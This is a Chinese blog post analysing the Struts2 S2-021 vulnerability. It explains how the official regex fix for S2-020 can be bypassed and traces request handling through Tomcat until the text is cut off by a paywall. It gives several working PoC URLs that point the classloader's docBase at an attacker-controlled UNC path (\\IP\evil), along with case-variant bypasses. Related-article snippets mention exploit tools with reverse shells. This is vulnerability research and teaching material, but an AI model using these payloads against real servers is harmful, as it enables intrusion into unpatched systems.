struts2漏洞S2-021

最新推荐文章于 2024-06-03 13:49:58 发布
最新推荐文章于 2024-06-03 13:49:58 发布
阅读量2k 收藏 1
点赞数
分类专栏: 软件漏洞 文章标签: java shell php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ymy131931/article/details/84597670
版权
本文深入探讨了Struts2漏洞S2-021,通过分析Tomcat处理HTTP请求的过程和Struts2框架的源码,揭示了漏洞的触发原理和修复不当之处。作者分享了检测漏洞的方法,包括利用HTTP参数和错误信息,同时也提及了后续的S2-022漏洞。
摘要由CSDN通过智能技术生成

前段时间这个漏洞吵得比较火,最近研究了一下tomcat底层代码,结合struts2的框架源码跟踪了一下这个漏洞的触发过程。在整个debug过程中,感触颇多,遂留下此文以作三思笔记,不敢奢望太多,只希望对感兴趣的童鞋有所帮助,大牛飘过。如果文中哪里有不准确之处,还望各位积极拍砖指正。

0x00 老漏洞新玩法

关于利用,不得不先说一下S2-020这个漏洞,其实之前网上已经有相关文档讲述S2-020的利用方法,比如下边这两篇

http://drops.wooyun.org/papers/1377

http://sec.baidu.com/index.php?research/detail/id/18

首先要感谢作者提供利用方法。个人还是更偏向利用docBase属性,因为这个属性tomcat每个版本都有。PoC如下,

http://localhost:8080/S2_3_16_1/hello.action?class.classLoader.resources.dirContext.docBase=\\IP\evil

这是S2-020的利用,我们再回到S2-021,首先看一下官方是怎么修复的,找到struts2-core-2.3.16.1.jar中的struts-default.xml,可以看到官方修复就是将用户请求用正则过滤了一下,而且正则写的也很简陋,包括github上给出的那个修复方法,都没有过滤掉真正的利用,如图所示:

所以将S2-020的poc稍微变一下型绕过正则过滤,便是S2-021了,并且struts2默认正则大小写是敏感的。利用就很简单了,下面这几种方法都可以

http://localhost:8080/S2_3_16_1/hello.action?class[‘classLoader’].resources.dirContext.docBase=\\IP\evil

http://localhost:8080/S2_3_16_1/hello.action?Class.ClassLoader.resources.dirContext.docBase=\\IP\evil


http://localhost:8080/S2_3_16_1/hello.action?top.Class.ClassLoader..resources.dirContext.docBase=\\IP\evil

….

这里我就以Class['ClassLoader'].resources.dirContext.docBase =aa为例跟踪请求从tomcat容器到struts2框架的代码处理流程,先说一下调试环境,这里我debug的是tomcat 6.0.24的源码+struts2.3.16.1的源码。

0x01 Tomcat处理HTTP请求

首先肯定是先由tomcat来处理请求,跟踪tomcat源码,这里tomcat调用JIoEndpoint.java的run()创建socket

最低0.47元/天 解锁文章
ymy131931
关注
专栏目录
Apache Struts 2框架漏洞
qq_68186313的博客
08-07 228
漏洞产⽣于⽹站配置XML时如果没有设置namespace的值,并且上层动作配置中并没有设置 或使⽤通配符namespace时,可能会导致远程代码执⾏漏洞的发⽣。2、在url处输⼊ http://192.168.56.134:8080/struts2- showcase/ ${(123+123)}/actionChain1.action 后刷新可以看到中间数字位置相加了。1、访问IP:PORT/struts2-showcase。3、将上⾯验证payload的值修改为我们的利⽤exp。
Struts2再曝S2-021修复补丁高危漏洞s2-022,拦截不完的安全漏洞
weixin_34008933的博客
04-23 632
4月23日消息,近日安全研究人员指出Apache Struts2漏洞公告S2-020里,在处理修复CVE-2014-0094的漏洞修补方案存在漏洞,导致补丁被完全绕过。目前官方在GitHub上对该问题做出了修正。该问题被曝光后,估计又有很多网站要遭殃。代码修复详情:https://github.com/apache/struts/commit/aaf5a3010e3c11a...
struts2漏洞总结(到19年4月)
weixin_34397291的博客
04-12 1190
Struts2漏洞目录 S2-001-远程代码利用表单验证错误 S2-002-<s:url>和<s:a>标记上的跨站点脚本(XSS)漏洞 S2-003-XWork ParameterInterceptors旁路允许OGNL语句执行 S2-004-提供静态内容时的目录遍历漏洞 S2-005-XWork ParameterInterce...
Struts2 S2-020绕过漏洞 解决终极方案
07-10 1217
Struts2最全面的远程命令执行漏洞梳理
LuoOpening的博客
03-29 888
OGNL的全称是对象图导航语言( Object-Graph Navigation Language),它是一种用于获取和设置 Java对象属性的开源表达式语言,以及其他附加功能,是Struts2的默认表达式语言。使用这种表达式语言,可以利用表达式语法树规则,存储Java对象的任意属性,调用Java对象的方法,同时能够自动实现期望的类型转换。OGNL最初是作为一种使用属性名称在UI组件和控制器之间建立关联的方法。
Struts2安全漏洞频出 ,多因Apache官方代码编写不严谨
05-01 484
日前,Struts2再次爆出安全漏洞,主要影响国内电商、银行、运营商等诸多大型网站和为数众多的政府网站。国外安全研究人员日前发现,Apache Struts2在处理CVE-2014-0094的漏洞补丁中存在缺陷,会被轻易绕过,可导致任意命令执行。黑客进而能够窃取到网站数据,或者对网站进行DDoS攻击。 360网站卫士盘点了近年来曝出的高危Struts2漏洞,并分析了Struts2为什么屡...
struts2漏洞s2-045,不升级jar版本的修补方法,已验证.docx
07-04
Struts2 漏洞 S2-045 修补方法 Struts2 是一个基于 Java 的 Web 应用程序框架,广泛应用于企业级应用程序中。然而,Struts2 中存在着一些漏洞,例如 S2-045 漏洞,该漏洞可能会导致严重的安全问题。今天,我们将...
struts2 最新漏洞 S2-016、S2-017修补方案 .docx
08-01
Struts2 最新漏洞 S2-016、S2-017 修补方案 Struts2 是一个基于 Java 的 Web 应用程序框架,由 Apache 软件基金会维护。最近,Struts2 发生了两个严重的漏洞,分别是 S2-016 和 S2-017,这两个漏洞可能会导致攻击者...
struts2漏洞S2-0211
08-08
### Struts2 漏洞S2-0211详解 #### 一、背景介绍与漏洞概述 在深入分析Struts2漏洞S2-0211之前,有必要了解其背景信息及其基本原理。 ##### 1.1 Struts2简介 Struts2是一个基于Java的Web应用开发框架,它提供了...
struts2反序列化漏洞,存在s2-005、s2-016、s2-016_3、s2-017
08-28
首先,s2-005漏洞(CVE-2012-0881)是2012年发现的一个严重问题,它涉及到Struts2的OGNL(Object-Graph Navigation Language)表达式在反序列化过程中的不当处理。OGNL是一种强大的表达式语言,允许动态访问和操作...
Struts2终极漏洞利用工具
03-09
Struts2终极漏洞利用工具 Powered By 孤独成 thanks to 峙酿君edwardz http://weibo.com/bingobest http://weibo.com/evilniang 集成获取服务器信息,远程命令执行,多种方式文件上传,反弹shell,文件管理,数据库管理等功能。欢迎使用交流
Struts2 安全漏洞解决方法
09-15
Struts2 安全漏洞解析,距离上个版本发布仅仅过去1周,apache struts官网又发布struts2最新版本安全公告,主要修复了一个漏洞,代号S2-022:从漏洞简要描述来看,确定是对之前S2-021的补充。
Struts2远程代码执行漏洞分析(S2-013)1
08-08
Struts2 远程代码执行漏洞分析(S2-013) Struts2 是 Apache 官方的产品,最近出了一个远程代码执行漏洞,编号“S2-013”,目前是 0DAY,官方没有修补方案出现。这个漏洞出现在 includeParams 属性中,允许远程命令...
struts漏洞总结
Fiverya的博客
01-17 2833
struts2漏洞,从S2-001到 S2-061,嘿嘿。
Struts2系列漏洞利用工具-Struts2全版本漏洞检测工具(三)
siu~
09-21 3449
Struts2系列漏洞利用工具
【护网必备】最新Struts2全版本漏洞检测工具
最新发布
Fly_鹏程万里
06-03 931
运行工具后点击“检测漏洞”会自动检测该URL是否存在S2-001、S2-005、S2-009、S2-013、S2-016、S2-019、S2-020/021S2-032、S2-037、DevMode、S2-045/046、S2-052、S2-048、S2-053、S2-057、S2-061、S2相关log4j2十余种漏洞。2、S2-020、S2-021仅提供漏洞扫描功能,因漏洞利用exp很大几率造成网站访问异常,本程序暂不提供。1、“批量验证”,(为防止批量geshell,此功能已经删除,并不再开发)
java struts2 漏洞_Struts2 s2-016漏洞的完整解决方案
weixin_36074841的博客
02-13 507
Struts2 s2-016漏洞这里不做过多描述,官方描述见下面网址:解决方案(以struts 2.1.8.1版本为例)1.下载struts 2.1.8.1 源码struts-2.1.8.1-src.zip下载完成后,记得进行MD5验证2.eclipse建立一个war项目3.将struts-2.1.8.1-src.zip内的源码拖到项目的src目录下4.找到对应struts-2.1.8.1的xwo...
Struts2对应CVE编号记录
ch4nge
08-18 1880
S2-001(CVE-2007-4556) - 远程代码利用表单验证错误 S2-002(无CVE) - <s:url>和<s:a>标记上的跨站点脚本(XSS)漏洞 S2-003(无CVE) - XWork ParameterInterceptors旁路允许OGNL语句执行 S2-004(无CVE) - 提供静态内容时的目录遍历漏洞 S2-005(CVE-2010-1870) - XWork ParameterInterceptors旁路允许远程命令执行 S2-006(CVE-201.
Struts2高危漏洞详解:从S2-001到S2-003
"struts2漏洞列表,包括S2-001和S2-003,描述了这两个高危漏洞的详情、受影响版本及exploit示例" Struts2是一个流行的Java开源框架,用于构建企业级Web应用程序。然而,随着它的广泛使用,一些安全漏洞也逐渐暴露...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值